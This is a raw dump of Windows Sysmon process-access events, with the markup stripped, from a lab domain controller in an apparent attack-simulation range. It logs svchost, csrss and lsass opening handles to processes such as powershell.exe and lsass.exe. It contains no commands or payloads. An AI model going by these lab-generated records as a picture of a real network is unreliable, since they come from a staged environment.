10:39:53.964{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000936Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000935Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000934Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000933Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF9-5F80-1000-000000007F01}11321700C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000932Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000930Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000929Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000928Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000927Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.948{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000926Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.948{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000925Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.932{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-1800-000000007F01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000924Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.932{733EE690-3DF9-5F80-1000-000000007F01}11321700C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1800-000000007F01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000923Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000922Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000921Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000920Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000918Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000917Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000915Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000913Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.917{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000912Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 